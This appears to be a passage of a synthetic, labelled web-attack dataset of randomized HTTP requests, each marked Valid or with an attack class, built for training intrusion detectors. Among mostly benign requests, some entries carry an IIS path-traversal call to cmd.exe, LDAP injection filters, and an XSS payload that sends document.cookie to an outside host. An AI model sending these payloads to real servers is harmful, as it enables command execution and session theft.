End - Id: 45932
Start - Id: 17662
class: Valid
GET /tORb7DKb@.mspx?tpchder1gol=3bt+&ni=cjX&tlxhw=6860&o3=c4SVCpuDqB__&8pn=le+e%3Cvarhtpassylemteid5&aZ0CkLWE=gs9yjnukznaeius&eteaYc8syis3o0u=tt1at+eainc&7esDnEenHi3tgl=nocate+lwpEe&euTUjEhAet7yo=4141&oleow7iltrLannc=reOeswdYbte5nxn&ahtebrrlwE2aenh=sz&igst=gmd&teeggl=t%24%5Bpasswdt9%3E1tr%3C%3BlpH+m HTTP/1.0
Host: 217.32.221.147
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ceyCmj-cu;q=0.6, ph4g7-itrabsc;q=0.1, lthOuG-Istcs;q=0.7
Cache-Control: no-store
Client-ip: 230.206.198.120
Cookie: nyeedxnrom1eYn= yaJodoilike;asp3u=ofcn1wceeeoyts;3FxTbPR=5;mdclindmjue=258;goabeyhpd=eIbx8t9hcM6e;sne=mTU9SW
Cookie2: $Version="003"
Date: Sun, 05 Mar 06 15:48:16 GMT
ETag: W/"1T3wCuHxHRQqz80"
Expect: 100-continue
From: orsph@74It.it
If-Modified-Since: Fri, 07 Dec 07 06:05:00 UTC
If-Unmodified-Since: Sun, 14 Jun 09 18:25:10 GMT
If-Match: "5NjIRYjJ6Vi3Ovv"
If-None-Match: "wSj-fZGhYh3yDtNrJvfI"
If-Range: Mon, 20 Dec 04 11:55:58 GMT
Max-Forwards: 51
MIME-Version: 0.7
Pragma: tEtT=dxeit
Proxy-Authorization: NTLM c3RkdWdlYXJyeGhPbnRrbHlpZmllbWQ4Ym9HbnUwZWxlcm9pZWVvZVRy
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: /niep5ed/nentc.sh
TE: gzip;q=0.8,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.9 (X11; U; Solaris 2.8; Hd-e9; rv:5.6.7) Gecko/71482390
UA-CPU: Sparc
UA-Disp: 4701,7597,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.0 www.eprreIcs.jpg
Transfer-Encoding: compress
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 135.141.53.205
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17662
Start - Id: 44215
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.sshamoct.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Thu, 13 Oct 05 04:07:04 UTC
ETag: "fCVpdS-De4XAIYRavLw"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: "02BWo86KrYbzqCLhlLoc"
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 8940
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest qop=i8kedAln
Range: 09660-850419
Referer: /Eutr/e6ytnrs/heg64.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.7 (Windows; U; Win98 0.6; re-0a; rv:9.9.3) Gecko/35440182
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 352x848
Via: 8.1 198.77.239.197
Transfer-Encoding: gzip
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 834 www.ecbnesr.png "oqoba9" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44215
Start - Id: 26170
class: Valid
GET /fmmehteiWds/neH80MJuKD@wMhlxdD.a/c.kGRCY7C6dwFCw0@/oiaoos/Riiowsg5itafyu/iB_@lJ/iO@AbI@pOGfEkC@6C/5xpJP9ozqgOBbz00Y/efwz/jCDpassthruxCNjG74wC3B/_H..shtml? HTTP/1.0
Host: 24.228.69.174:80
Connection: eltdd
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity;q=0.7, compress
Accept-Language: tX-meeb;q=0.6, ni-cie
Cache-Control: no-store
Client-ip: 2.25.83.104
Cookie: ccor9annt=rne+ie9nullrt;ur=pt$n;ED-https3=aif
Cookie2: $Version="949"
Date: Mon, 13 Aug 07 12:14:06 GMT
ETag: "DYofgNrQvLsWcob"
Expect: 5w5dueI=iiot
From: k64yl@itTpiyl.org
If-Modified-Since: Sat, 01 Aug 09 03:06:27 UTC
If-Unmodified-Since: Fri, 18 Sep 09 11:07:18 GMT
If-Match: *
If-None-Match: "QGltaZJ8B7-tLc.J_b5"
If-Range: Sun, 14 Jun 09 19:34:32 UTC
Max-Forwards: 579
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="renotae"
Authorization: Digest opaque="Gonohwud"
Range: 18-
Referer: /po6cne8i.zip
TE: trailers,gzip;q=0.8
Trailer: TE
User-Agent: wteo8aznth/1.5.6.4.5
UA-CPU: x86
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: 0.1 www.tzj0he.css, tT7i/4.7 156.106.71.142
Transfer-Encoding: gzip
Upgrade: sbthb/1.3, ctm/5.8, jMsOp/9.9, 0wrop/6.2, 2uaa1/2.7
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 102.26.95.103
X-Serial-Number: 77624336
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26170
Start - Id: 38845
class: LdapInjection
GET /9QdcI_VA_yALx46/u9DaraT@g-sm/eNuegM/xteAaistrmdtaesb/wihIhsvturet.pl?fets0trss=0782&lrzuycoEsxf=ai%27ld&w4uLfl=8zG_&tl=3le+e&aas3dn7ogenp=aune%29%28%26%28objectClass+++%3D+++lc*%29&UCmhtpassand=al%3Cm%28h4b&ss=oTuhNH&vicnf=621472&ihj=051&nyeterh0hytreu=dpassthruand%3Fa&B@UG8WUYWozy=20710 HTTP/1.0
Host: 247.194.79.146:96
Connection: Wdz8tt3
Accept: */*
Accept-Charset: iso-8859-9;q=0.2, cp-932;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-age=80633
Client-ip: 110.83.94.179
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="073"
Date: Tue, 22 Jan 08 18:17:11 GMT
ETag: W/"tZoFNZYSXd7bs4u"
Expect: cero3t
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Wed, 20 Sep 06 13:29:03 GMT
If-Unmodified-Since: Tue, 14 Apr 09 11:48:35 CET
If-Match: "XH5-bSPYDo.7hPTVRj"
If-None-Match: "NJtkfLmi6WnH-YQI"
If-Range: "olFOgZTknQx9bie"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="sSsd"
Authorization: Basic aHByYjozc2VjSTZiSA==
Range: 334983-612045,3433-74,55-
Referer: /in7ideE/dsislh/1sceaA9/ilobl/nabjaenA.wav
TE: gzip;q=0.5,trailers
Trailer: If-Match
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 2.1; aj-oo; rv:3.0.9) Gecko/75972977
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: HTTP/7.1 www.khiwjou.tiff, 7.8 www.4nSeet.js:2, HTTP/3.8 14.37.255.45
Transfer-Encoding: identity
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 74857144808284221
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38845
Start - Id: 23717
class: Valid
GET /eyels8a/vvw2cGcJaWlt5i_/faenyssttiKhThi.js?r.mailGbIx.=823&DbzTvinput=0&sekhweywf52S=exnhrtamUit&dni0neepiNrt=icbicoersti+r&bargy=s%3Ciand7%7C&rzsdnsgNns=7&0nodEu3=t.AKcL HTTP/1.0
Host: www.CsniehJn.com:7766
Connection: close
Accept: image/*;q=0.1, video/*;q=0.6, text/html;q=0.3
Accept-Charset: isiri-3342;q=0.5, iso-10646-ucs-2;q=0.1, koi8-r, us-ascii;q=0.8, x-mac-japanese;q=0.9
Accept-Encoding: 
Accept-Language: ru-raeeRrUh, ire-w;q=0.0, 5b9obp-Hnhs;q=0.0
Cache-Control: no-cache
Client-ip: 26.208.93.197
Cookie: oOphiizl=097
Cookie2: $Version="51"
Date: Mon, 07 Dec 09 18:00:52 GMT
ETag: W/"kb6e.IR6Q_h9Bn7yJ2"
Expect: jl0ss=mdssnhte
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Sat, 24 Apr 10 01:10:21 UTC
If-Match: "MPHlK5@rDQVYawK_"
If-None-Match: "qQDQ4FWFHrb3rYd"
If-Range: "gWql2ibHkLDyo8CS"
Max-Forwards: 310
MIME-Version: 3.3
Pragma: zyre=oReq
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ingo2N 9riaNhss=yUstnyi
Range: -5
Referer: http://ernbcrs.ch/Meuhpd/tleuos/tel4dt/emrrio.mdb
TE: deflate;q=0.3,chunked
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 1.2; Ne-te; rv:1.8.7) Gecko/56414085
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/1.0 www.uilanhkl.jpg, FTP/5.9 www.oahonis.jpeg, FTP/9.4 www.o1oi2tel.gif
Transfer-Encoding: deflate
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23717
Start - Id: 26029
class: Valid
GET /Neo2jomtxefnincsax2O/eiEormguSnfwmyemetkr/execryHfmuK0copyjcoK/sPY3TNo3Z@XvIUwb/hmkf04/eS.On6dqZ@lsT/aJEL_vixhfDGr5THP/tjn9R7KXNe6D8z/jo/fPzs/mrlh.css?LyvUhWP=8&ugpmstne=mbwpeuu&mIepxYeat=%2Btz%29+%3Asbot+toc%24i%5Bh&onqos18oht0=le&kstmI9ae=lsform&g6vflIE5reg=ieor3s63nndHvssLvz&fianfe2ty9ucsrs=8&Eta=4594224&htu6=66&bEeawE3elfblii=whsz%5Csipsiqdt&Wxp_dgiOkvv=67962835 HTTP/1.1
Host: www.ntststeont.ch:84
Connection: 0seHnd
Accept: video/quicktime;q=0.9, text/xml;q=0.7, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.6
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 34.105.255.188
Cookie: iobn=jkcrotiwhrusnl
Cookie2: $Version="7"
Date: Wed, 11 Mar 09 15:39:26 CET
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Thu, 03 Jan 08 18:43:53 GMT
If-Unmodified-Since: Sat, 25 Aug 07 19:18:47 UTC
If-Match: "0gwAxE2y6DgnH4Swq"
If-None-Match: *
If-Range: Fri, 21 Oct 05 05:56:46 CET
Max-Forwards: 44
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Digest algorithm=MD5-sess
Range: -13,874-810484,763-09710
Referer: /itueqi/oqmh.txt
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: rcvnhc (bgq3nDzR; ee@u_.-N2; shZertQmp; eMfg2p@@f; ax_k_k_V)
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4161x5305
Via: 8.1 165.219.67.179, FTP/2.4 55.202.206.9:0035
Transfer-Encoding: rAgte
Upgrade: lr6nji/0.6, no2fo6/1.2
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26029
Start - Id: 18684
class: Valid
GET /lTb/netcatJ2DDGe39-yNy7document/chonua/a14/oZ94tyTE8-@m/aScxXf2OS/e6.1v5/7PA./vtydcnl3e9ghae.bin?T0taesh95l1dl1r=7US0QjEvtKzL&c6eLreleuhhitgi=no&rGpat=8714&irjt3eanisrsbn=ud8Dna&n5tenuow=695662&tnTKekltV=5860&irvmfglbs=n%27q&CautoexecldOPMIl71=%26bs&ohi0eoe=lefk5Ooicikaye65&UK9MM=y1lG8&K%uDftpboot.iniTi.Pxp_C3=43280&taaee0me=sl%2Bqe&nneo1mir=tKVQqpUWu HTTP/1.0
Host: www.puorroik.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 121.201.44.25
Cookie: tysdkt=0651389
Cookie2: $Version="935"
Date: Sat, 04 Dec 04 08:19:05 CET
ETag: W/"ggu9gMdUqC-aFo4c6PO"
Expect: jnmvkdoo
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Mon, 01 Aug 05 08:12:27 CET
If-Match: *
If-None-Match: *
If-Range: "Tp9GmeYja2aDJG9@X"
Max-Forwards: 0165
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: sSOb one05bhe=dmn8
Authorization: idboo isnd=dlsb
Range: -26
Referer: http://H2anoueI.biz/d1nhr/gts6.tiff
TE: deflate,gzip;q=0.1
Trailer: If-Match
User-Agent: Mozilla/1.3 (X11; U; SunOS sun4u 0.5; wo-M8; rv:6.0.8) Gecko/69428292
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8595x9488
Via: HTTP/5.7 www.7aamuas.png:146, 5.7 www.f4orh.css
Transfer-Encoding: identity
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 343586
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18684
Start - Id: 38508
class: LdapInjection
GET /fnxraDeeeiretremle/ouTpUa8.cfm?DllSG=80292913&inGRr=duArkeRldeaeoezo&sth=4&gsl6aickci=nn&aeeuIbeIws=astYdfidrmteayR&a6ofdiiann=no&5a=%29+%28++%7C++++%28cn%3D*o++++%27brien*+++%29%28mail++++%3D*o%27brien*+++%29+++&xtHEuaetmz2W=uc%29n&yHGj6=3tsliytvSitE&zwxBaccepta=%40+%27e&sahrot1KuicnSv=0029&ii=acEnoie&zptrt9bittlth=%29e0jepydghttpse&dsock_streamraGCq=6531515 HTTP/1.0
Host: 225.197.130.221
Connection: close
Accept: application/zip;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Sun, 30 May 04 19:37:57 GMT
ETag: "qcoSX53foSbz95-5"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Mon, 25 Apr 05 02:25:32 UTC
If-Unmodified-Since: Fri, 20 Feb 09 11:23:30 CET
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Tue, 14 Nov 06 03:17:46 GMT
Max-Forwards: 087
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM U2xkYXBicmQ2bmFDbXJzdGxlZXQxNmllck9SNmM0aWRsb2h2eHI0dWV0
Range: -087,245-62681,-648438
Referer: http://www.aotreaai.it/n8yaOtp/yrIip/re43hul/ptDktan/mdsds.jsp
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 6.3; bh-do; rv:8.3.2) Gecko/83385761
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: FTP/1.8 3.6.237.98:7, aur/9.7 177.41.40.136
Transfer-Encoding: gzip
Upgrade: mre/2.4, ebeai/1.2, ouoaci/4.9
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 134.223.187.109
X-Serial-Number: 30599
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38508
Start - Id: 2048
class: Valid
GET /iKrnmeihe1nSbTtebee4/nm/oGzawsonmtcileeeehbe/zvR4US7f2XS2b3K6k.js? HTTP/1.0
Host: 28.106.187.104
Connection: onoseoLr
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: deflate;q=0.3, gzip;q=0.4
Accept-Language: s-nlu2lg, 2fcet-7f6n0le, ob9ss-9, R-aonan;q=0.2
Cache-Control: colIki=qdvOgtge
Client-ip: 42.237.158.27
Cookie: 5uwhere6GT=75613897;dN9Dasrre=8228
Cookie2: $Version="9"
Date: Mon, 28 Feb 05 19:04:30 GMT
ETag: "MMjhxV02xzZUJmdm9eYH"
Expect: 100-continue
From: occ0efi@8ll4r48z.be
If-Modified-Since: Sat, 23 Jun 07 02:49:15 UTC
If-Unmodified-Since: Wed, 07 Sep 05 16:13:00 CET
If-Match: "Fj823QwW35cdj_86VqIb"
If-None-Match: *
If-Range: Fri, 01 Apr 05 07:45:54 GMT
Max-Forwards: 845
MIME-Version: 1.2
Pragma: wlhped='ab'
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic aDA0ZWV6azptZW50Y3Q=
Range: -586766,7072-,732551-
Referer: /eaxoss.asp
TE: trailers
Trailer: Date
User-Agent: i0o23hte (8fpiwo; eYIO8Lm; oJSb61jDzB; lRFE4qy)
UA-CPU: PowerPC
UA-Disp: 5129,6449,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8738x825
Via: joiaf/9.2 245.55.245.67:736, FTP/3.1 31.11.27.109, zdb/3.0 121.192.91.175
Transfer-Encoding: gzip
Upgrade: l0e/3.9, r2qtn/3.5, ewhpe/0.7
Warning: 517 www.ga29eer.tiff "dl7koePensh3m" "Mon, 01 Aug 05 08:22:34 UTC"
X-Forwarded-For: 18.100.221.44
X-Serial-Number: 9493584291760843409
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2048
Start - Id: 24357
class: Valid
GET /reTry7opnnelnxdzesy/oO6TiR4yNCJbmXO/a2949o@H_lPbx/nhdMaoX9wt7ttobtb/roakLcDzcCQm5e3dpaW/rkLvnNENorHDV.swf?Z.lgroup by0AhFpPidN=rf%40+exec&ibrUoeerd8e=eyudtO&riEu=uteWj+%25ost&eb=88979960&n075neh=u%29tia&7ddono6hch=273&t5eed2sy=dwlraatA8d3dpd&sZHtelnetuniony-mpMx=t_zE&9dtphou=opt%5Co HTTP/1.0
Host: 227.55.65.130:80
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, windows-1250;q=0.9, windows-1257;q=0.5
Accept-Encoding: 
Accept-Language: oasvols-Hixrsdru;q=0.7
Cache-Control: max-stale=5
Client-ip: 114.108.65.238
Cookie: dhn4tarbl=4603;dwoh0nsdt=evG5;miJwua8=uiy3 gl\nph-fxadx6=h
Cookie2: $Version="7"
Date: Sat, 12 Feb 05 08:46:25 GMT
ETag: W/"iGg4GyFoonVM8sn"
Expect: xEoesret=heriSe
From: 5hRu@STpwssetis.be
If-Modified-Since: Fri, 02 Apr 10 14:02:13 GMT
If-Unmodified-Since: Tue, 21 Aug 07 14:53:49 CET
If-Match: "TJpOzITW0hZOSsML6"
If-None-Match: *
If-Range: "ivQemFmBM.Yo9lMU"
Max-Forwards: 1583
MIME-Version: 5.2
Pragma: RahasOc='puls7ih'
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: tgii7t 6heesirh=sretjt
Range: -290,922508-,-602
Referer: /betrhrh8/9twdxEnn/eoa7k2/Y5ikpaa.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 6.2; an-an; rv:8.2.9) Gecko/10713885
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: HTTP/4.7 www.5i7Bc26v.tiff, 7.2 www.ssvoOg.tiff
Transfer-Encoding: identity
Upgrade: neBei/6.4, t4neei/6.4, Iaotdt/0.8, ennr/7.0
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24357
Start - Id: 13226
class: Valid
GET /eAbibo/sp0Q1j6K-OJaqCmAf/el0tltla0.htm?rwfO_=shttps&aTJMupdatechildtL.=s&oa0a6hdefp=uss&Es2la=glI HTTP/1.1
Host: 77.69.239.62
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.7, cp-936
Accept-Encoding: 
Accept-Language: s-pIldbb, ehIuaaue-mGltMi, c-uwDn, oiubh-E;q=0.9, kg1-rsk
Cache-Control: no-store
Client-ip: 93.188.236.120
Cookie: Nllglf5gma=8169;FHV_P=pro
Cookie2: $Version="9"
Date: Mon, 11 Jun 07 14:16:22 GMT
ETag: W/"wKB4PF50ISEJhLSI"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Tue, 28 Nov 06 05:22:33 UTC
If-Unmodified-Since: Sun, 17 Dec 06 14:11:25 GMT
If-Match: *
If-None-Match: "LKd6xXfA9tY27kEFRBY6"
If-Range: Sun, 11 Jul 04 12:12:33 UTC
Max-Forwards: 06
MIME-Version: 2.3
Pragma: ltondh=z
Proxy-Authorization: NTLM Z291M0xhdmFvaXR0bzFhdG5ubHF5OWVqaWlvbjY0bW1hZzE0cmE=
Authorization: Digest username="tte8oeYd"
Range: 781398-
Referer: http://www.nelsc.de/eihd6sti/dipwCd/g7onn9e.jsp
TE: trailers,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 9.1; ml-w8; rv:6.6.3) Gecko/21029718
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0644x4793
Via: 9.0 40.178.192.119, 8.6 www.nilibdg.shtml:1006
Transfer-Encoding: compress
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 075 168.197.141.2 "5h4rilredoSnhbsuyw" "Sat, 17 May 08 02:25:01 CET"
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13226
Start - Id: 47222
class: XSS
GET /vrn/EwnOI2uii0kh8/nIg8wQq.Y8QGA7YZUBTE/nL/uTceAmd9ms9acenUsT/seutdtsehlrU7ko9/ysa/Laccess_logHxEwwinntBFpasswdGr/zHK5OHn7S/IN_RZHzU.html?e6dy2o=3dm%40pN&lhEe7otusrfayde=6236762&ejssrneD=exechw&iurterfo=wG&pdanciTl=ag%3EalN%24&slhei=hE6B2P3zu1Pc&lteci63Hijx3=10837&6g=%3Cstyle++++type++++%3D+%22text%2Fjavascript+%22++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ratrge.com%2Fcgi-bin%2Fenro.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&xT97update5=0043890&NztrllEss=95000 HTTP/1.0
Host: www.xarbv.st:18444
Connection: eqjr7s
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=64203
Client-ip: 179.225.149.173
Cookie: fliirtqasnayhsa=iwgett;priod=74029900
Cookie2: $Version="87"
Date: Mon, 13 Nov 06 12:34:40 GMT
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: 100-continue
From: nsseehjh@a5ejeaendE.biz
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Fri, 01 Apr 05 15:31:31 CET
If-Match: *
If-None-Match: *
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 4227
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 7379-
Referer: /olettl.jpeg
TE: gzip;q=0.1,trailers,gzip;q=0.4
Trailer: Referer
User-Agent: Mozilla/1.3 (compatible; Konqueror/4.0; Windows NT; enwmanTlUs)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: FTP/5.8 243.168.202.251, 1.0 www.6vs9Z8if.jpeg:949
Transfer-Encoding: tEne
Upgrade: rako/1.9, sgo/1.5, 5edi/5.4, t0a/2.0
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47222
Start - Id: 31738
class: Valid
GET /w52eHP@eP3rd/m8.iOop/Npassthru.2O..hBVLFTX/tc99ooPhNnrn/Blnemr9vee/eitanhlrZuottOs/txSx5gjQIS10m/raui1cspwnetDlo/sGMN3yoAYbH6u5Xtt/eSValz891VLB6/enleoe/e88.swf?cs=anyz&awMauicell4r=hnsYbT3t9whk&enninseta=2&mnkocz=5ieoEoe&entuSbnL2th2rec=i8s&zudeI9ntebi2i=8478683&cnt5oycjmrtnzo=tmC-&gndocecaw=t7b%28u8+yxctx&MaHniKj2c=204120&Fm=tAsiceaaavN&eYr3lcdtAOTets=bs&erjZmq5of=5393041&Icori=m3%259ees%28 HTTP/1.1
Host: www.3Lpa.gov:1766
Connection: arzSelon
Accept: audio/x-wav;q=0.6
Accept-Charset: windows-1251;q=0.9
Accept-Encoding: identity;q=0.9, gzip;q=0.8, compress;q=0.2, identity, gzip
Accept-Language: ax-setttent;q=0.0, r27Tquo-Qprn
Cache-Control: min-fresh=36023
Client-ip: 213.193.145.220
Cookie: mzqiaaoZ=anlreasNllietheq;tseetdsL=v;Tsecw=7375384;oa3aNc=tsH+ex)locationenfnph-
Cookie2: $Version="50"
Date: Sun, 30 Aug 09 19:35:08 GMT
ETag: "QpCH@I9C6tX3q6U4vK"
Expect: a3noclr
From: hSnrwf@ca6hdgec.biz
If-Modified-Since: Thu, 06 Dec 07 15:06:17 CET
If-Unmodified-Since: Sun, 15 Feb 09 14:21:42 UTC
If-Match: "FAcgZRUSkWC4ODQH"
If-None-Match: *
If-Range: *
Max-Forwards: 1295
MIME-Version: 5.0
Pragma: grrdff='Ordycm'
Proxy-Authorization: NTLM dHRzVmZ2cm1oeHRjc2lsdGtudHR0aXA3MG5vdHNlZG0=
Authorization: Digest realm
Range: 5077-46,223-
Referer: /ehni/ienU.dll
TE: deflate,chunked;q=0.4
Trailer: If-Range
User-Agent: liFkPL http://www.aEh90De.gov
UA-CPU: PowerPC
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0437x4847
Via: 9.4 127.151.255.30, tsioc/1.8 247.122.204.150, 3.0 148.111.195.189:724
Transfer-Encoding: deflate
Upgrade: Nesagu/1.4
Warning: 655 www.5ege.shtml "eqstpn1youlwhxc" "Thu, 03 Jan 08 01:44:00 UTC"
X-Forwarded-For: 135.18.20.109
X-Serial-Number: 48619214669
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31738
Start - Id: 46280
class: PathTransversal
